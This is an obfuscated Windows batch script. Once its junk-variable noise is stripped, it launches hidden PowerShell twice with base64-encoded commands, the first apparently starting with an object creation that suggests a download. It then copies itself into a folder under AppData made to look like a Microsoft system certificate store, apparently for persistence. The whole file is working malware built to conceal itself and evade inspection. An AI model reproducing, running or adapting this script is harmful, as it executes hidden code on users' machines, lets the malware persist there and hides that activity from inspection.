:: obfuscated, good luck@%bzx%e%DF%c%lBoEOAa%h%nPU%o%kwiKYPemu% %i%o%AiDwIBrP%f%Wa%f%n%

p%DEkrDkDx%o%l%w%XBuBBzJzwi%e%njj%r%bqkmvSHOv%s%qadjDfL%h%UCSBd%e%H%l%MmosejXzQ%l%yaRG% %Gi%-%h%W%hqjprFYT%i%jcBJkx%n%DEJ%d%PkQUO%o%BXoML%w%kBDzIta%S%OlyuhG%t%RQsGFvo%y%Q%l%vja%e%uXlbjZvKTC% %hSVZTs%H%chYBxAG%i%J%d%BKcGFLd%d%wqEUjGWt%e%EUaQmtwW%n%tPZ% %JHnMUYjDY%-%S%N%fvQsreud%o%awfwl%L%INufRRtRl%o%ZOyASQKWnL%g%AVgKieqypq%o%Va% %hJsBhB%-%eSnc%e%sayVRQpcel%n%KNRKvabV%c%MBIjyh% %PDjxP%K%OZbX%A%zgdjturqat%B%VGPrMXtFY%p%Uf%A%MjGRlMu%H%Q%c%yRuCbb%A%JAqBIePbWO%c%peiOwyb%g%CxPm%A%e%g%gEcvlOFHx%A%Bpj%G%nDAdi%g%dCPA%A%omOmRzFJR%d%LDo%A%Yz%B%gMMNGgHy%0%FTGL%A%whaJ%H%ONyJxp%A%cYByX%A%KSa%c%YnwRzOuB%w%PFrcIVV%A%iurcho%6%qIekw%A%HzRXi%C%Ee%8%AWSPFSR%A%ojD%L%hjWnUMqf%w%ostgViKt%B%cKHo%w%Frd%A%NcAPl%G%L%E%VKc%A%k%c%hoD%w%edlLNSqrIt%B%ROxpWVPrzt%0%ISibr%A%XXVlb%G%gHtgzyqVY%U%B%A%kg%Y%l%g%KpNwJ%B%deTlSKrUq%p%st%A%Dto%G%B%4%PK%A%kqxhU%L%JTIQZvBRu%g%cqfrSNNUs%B%FEoVuLxcsi%j%B%A%zFcLIZsVbg%G%dJfnmAR%8%CHdmxE%A%ZKtLviad%b%gHjIFcatQA%Q%zoJujQId%A%hXjab%v%ZCQQfegy%A%iSEhVxDdL%H%cumiouhX%I%t%A%lWjygWcYTN%Y%JI%Q%muALzOsP%B%HWuErs%3%sVjATw%A%a%C%XANvrnM%8%hDXG%A%ukZPCnGFYH%a%ZOvXoVicg%A%w%B%rnHYF%j%Tt%A%gZIl%G%MblhnNXlUy%c%yyMK%A%kFDMEo%N%GyRQtpq%A%ihEMtZ%B%ABvkhe%y%CBPnmcwX%A%jotN%G%VRrkX%s%HiIrmDhL%A%sAMjBBgTIY%Y%yAc%g%UtffqPdt%B%PmeSR%k%pP%A%IO%C%BkmhtjroDq%k%uUfatCcdP%A%XBhAQdlCKo%L%Ohjclc%g%ZrBrk%B%IA%j%SUYKfEexAu%A%O%G%a%8%G%A%EUjGyU%b%Gqjbpjh%g%nCs%B%PYPmXS%0%TN%A%tSby%G%iG%U%meLPs%A%tynng%b%v%g%tVwhp%B%eBS%0%ppVeRBmP%A%CT%C%ioq%A%Riw%A%fLTXMbOk%P%XZlcxP%g%b%A%TMr%g%X%A%vQdP%C%NnOv%Q%XctCh%A%dVlvwyDmsV%Z%aPhmmAJvB%Q%KCwQfRv%B%PKdxMsk%u%qyxgpnU%A%HiJVgNhSBB%H%o%Y%OYIphPFi%A%RirEzhkL%O%Y%g%ftTYY%B%KWRmouNxSU%M%Yuragtl%A%OLz%E%Nvb%8%VUaM%A%ynrpx%Q%TubGbw%w%haISJ%B%ERQZc%B%MBfIZpEgel%A%ZVuDCfkwn%E%CKgyY%w%wjWWdTFHI%A%odfBMjrQmj%Q%lS%Q%wSBQIJK%B%Z%Q%XxAG%A%viMJHdLnxj%F%Yuu%A%QkLCENME%A%Y%R%Epni%A%rh%B%xiRlrXGUl%B%rH%A%LkO%F%wMDQ%Q%tUaahG%A%hk%Q%GPPSCQtR%Q%g%B%ZFNorpe%c%gKNhphwFS%A%CoidDZKo%H%yTDJfIJjg%M%MWBQVJ%A%u%e%iqCdLI%Q%Mq%B%htLww%z%DE%A%Msv%G%hZ%I%jVw%A%uokWslG%b%OKlXilMeep%w%VnYk%B%SppiwgCU%v%PwWSUoC%A%hSZfyyTIF%H%GgCwgilyL%Q%vXDdQ%A%SfgrICghfF%L%KYPBrkh%g%szgbz%B%WqpT%w%hPrP%A%VQbXQQXZL%H%HPei%M%TR%A%gMXnGkyOS%M%ugLDrMecPq%Q%DcMkodecXf%A%kU%=%NxasLPjPK%
p%hbvpzuV%o%R%w%WwfuyAsTO%e%FRpKXosn%r%HpTDR%s%CQpDgbKsFV%h%hknjUPko%e%Hxv%l%U%l%EBhrLkj% %MtDRO%-%rTllbgTvtw%W%RM%i%nlBScW%n%PYixIgRU%d%pTzWco%o%ekzP%w%iedlAZZk%S%BdxaPx%t%OoKm%y%QkPbSkh%l%NMqqTMVs%e%rZINqoHp% %kPVmOhbZ%H%k%i%ct%d%KYXwVe%d%stfuc%e%aUX%n%WoBWYuGn% %pDSe%-%zuuylaLOX%N%hqRAJHTUs%o%OnSJiaEuQs%L%dxQ%o%LcECCnsNDL%g%oNGYJgUFXy%o%AnIuS% %oi%-%MnLEj%e%ufoblLJ%n%kRAjySiD%c%ZfXU% %Htnwyz%c%Gv%A%dRc%B%awv%v%A%A%ohbu%H%ExfcalkHxN%c%TWmU%A%v%Z%M%Q%ZSjXNlE%B%hqFseiF%y%zFYdfuEhDi%A%kioqd%H%gKO%M%yAAQyryo%A%SbwxAbY%a%DScJ%A%odnwK%B%NZVTRpI%l%vg%A%RxF%G%aRypn%w%ylc%A%WCOX%b%QiN%A%XeL%A%UwjZfzG%g%ylS%A%X%C%OaXYg%0%am%A%YOSPga%R%achT%Q%movp%B%H%4%gsnbEyv%A%AqwTWc%G%MQElxDtbp%U%nawEKq%A%bwdgn%Y%JiDtDavMN%w%UUkshOHfC%B%GwTHbEzIN%1%fPJsyzBQc%A%f%H%NqSWNH%Q%qwj%A%NHummqe%a%YCfImZB%Q%qjyc%B%xRzB%v%I%A%Z%G%VmO%4%EVjUSFaH%A%UORIs%U%lsQ%A%sAm%B%HcyFgacaxv%v%xvnqkhk%A%jGMKzQWFgO%G%rL%w%Uv%A%TwTum%a%tXIfQL%Q%zDU%B%xuNf%j%NER%A%n%H%nKFRF%k%mCVyggAxJP%A%bgmum%I%CQRcijTR%A%PHZB%B%aKHZ%C%rnQFwu%A%uwenF%H%RY%k%tnrGmh%A%C%c%AE%A%fr%B%Y%h%UBHxnkvs%A%x%H%RlsVSmy%M%acbTvi%A%qWPfDCzqgT%c%PCEuciPS%w%FxPRI%A%DCN%g%dWrQlqL%A%IsDrtK%C%bTGvfDKj%0%kZtr%A%uPeN%R%r%g%qexNcI%B%SYpbyscrad%p%TIYBYfm%A%IoSmvl%G%Qrt%w%MZTuukMob%A%nPVe%Z%AuBSTCJ%Q%UWVuFvNFPx%A%SBEvQYI%g%n%A%AgsCNNBvKS%C%d%Q%FVrYZ%A%YCLAiT%Z%C%Q%satDeymta%B%L%u%FTHagw%A%psmMwYsfyF%H%u%Y%yDNhn%A%Klw%O%rnBu%g%DSnKCNdn%B%jfrBWu%M%bXdFzNstl%A%lI%E%ReQpKyjSRR%8%wcJJVLK%A%YDSePtr%Q%YXfMnNHVB%w%kntrVJCAu%B%JYoHaROAAe%B%fTkQc%A%IDIz%E%YhlBzHFXe%w%cnnli%A%tChNeMsxGH%Q%Hwj%Q%c%B%Niy%Q%E%A%AV%F%ekHQUERj%A%YqJa%A%qmWtmc%R%IMryw%A%jnOcDOES%B%SeVZyT%B%cdmARbS%A%HeHgbUSn%F%Y%Q%ljIZQkQ%A%ItRvFpjHZ%Q%GTGSSmg%Q%gAyObwk%B%NBNbbgE%c%oHrNjYLNOc%A%JfsCeGdX%H%oNVjOgFJ%M%NmDCXPwrZ%A%ecEVq%e%ClbvRKQaf%Q%PyXequF%B%vLkWgof%z%DbocaGaAd%A%JJKikgJnK%G%rntRDUI%I%TOj%A%vMtJfaEoY%b%Uq%w%GcBSskcJp%B%VoNMytjv%v%wCGHU%A%sgHmsad%H%f%Q%DuRPnyYo%A%fuwX%L%aHAOYIbF%g%uoBD%B%BHqwz%w%iUKVUe%A%Re%H%trd%M%RToq%A%dAoyrJ%M%GIY%Q%DZPw%A%lvdlgo%N%cOBYoYa%A%oQWULOR%A%FIokwsn%o%OWT%A%zEgD%

s%nqsh%e%ykmsVeIHN%t%jtrG% %TBsUWi%"%QuiTBAMsd%d%yUpwAacdEq%e%jMBuL%s%LvJAf%t%BzBCshY%D%mgjqlYmpvz%i%qjxYFHc%r%hKNac%=%Ogec%%APPDATA%\%trZFG%M%UKuOCSz%i%wyG%c%BoqF%r%jKsj%o%MArgRPyiV%s%z%o%uQCiXeejE%f%euHXPlI%t%Ijnr%\%wBPVEmO%S%wqdz%y%hL%s%lww%t%TVPJbKqGH%e%BPhBNGzdS%m%jDQ%C%yb%e%LJUPNMT%r%PhnozCQinq%t%wl%i%f%f%PHTeTbS%i%fvh%c%GXL%a%eRjs%t%BrdXPMpp%e%XuXHZlZZ%s%iE%\%S%M%sdua%y%fWXksoP%\%u%C%gzpioaU%e%WlhcqAcQ%r%URQLuE%t%vEc%i%wIxsYw%f%ciPfvHECro%i%PvGVFN%c%v%a%NphYb%t%Obg%e%R%s%pEyVGMtfz%"%L%

i%Yq%f%P% %rdQV%n%u%o%b%t%h% %WuXVLHYxK%e%HBH%x%StoSdV%i%cSt%s%iKqqkpAOsj%t%tcyw% %jQEdFOy%"%XFzRxJ%%destDir%"%vPutNidt% %GayGTx%(%p%
 %hsl% %oKHUBh% %B% %eWi%m%Cw%k%PoShXfRX%d%zykNiceyPe%i%rqXkn%r%CYTB% %qfkSuJ%"%iNwCLBV%%destDir%"%mJA%
)%rZYSxIt%

m%G%o%M%v%PPYoexOWff%e%kqeBCYaqI% %Sv%"%RvduLwZK%%~f0" "%d%xNITsz%e%ueAxvxu%s%fWoILTyT%t%LSCc%D%n%i%OxXnZb%r%Wvdrcip%%\"
